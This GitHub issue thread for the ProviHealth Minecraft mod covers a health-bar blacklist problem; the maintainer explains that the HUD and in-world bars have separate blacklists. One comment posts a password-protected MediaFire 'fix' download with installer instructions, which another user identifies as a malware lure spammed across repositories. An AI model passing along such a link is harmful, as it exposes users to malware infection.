### ISSUE TITLE
Entities are showing health bar despite being blacklisted

### ISSUE THREAD

**Issue by Partonetrain** [Provismet/ProviHealth#31]
### Type of Error

Incorrect Behaviour

### Description

Mobs are showing their health bar (but not their portrait, which is expected) even though they're in the blacklist.

### Mod Version

provihealth-1.2.4

### Minecraft Version

1.20.1

### Mod Loader

Fabric

### Steps to Reproduce

* add minecraft:pig to blacklist
* restart game
* observe pig

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Partonetrain** [comment]
^ obvious virus

**Comment by Provismet** [comment]
> ^ obvious virus

What exactly are you referring to?

> Steps to Reproduce
> - add minecraft:pig to blacklist
> - restart game
> - observe pig

There are _two_ blacklists. One for the HUD and one for the in-world health bars. Upon testing using the steps above, both are working as expected.

You used the wrong blacklist.

**Comment by Partonetrain** [comment]
@Provismet there was a random user who posted a download link to an exe with a "fix". It's been happening on multiple repositories 

Does the healthbar blacklist not show in the ModMenu config?

**Comment by Provismet** [comment]
> @Provismet there was a random user who posted a download link to an exe with a "fix". It's been happening on multiple repositories

Oh, that's odd, I didn't even get a notification about that. Thanks for the heads up.

> Does the healthbar blacklist not show in the ModMenu config?

It's there. There is one blacklist in the HUD section, and one in the In-World section. Both should be at the bottom of their respective sections.

HUD:
![image](https://github.com/user-attachments/assets/e560dd3f-2d06-480a-891e-4ed408f4de63)

In-World:
![image](https://github.com/user-attachments/assets/30e9d78b-b615-4959-b2be-9760901e572e)
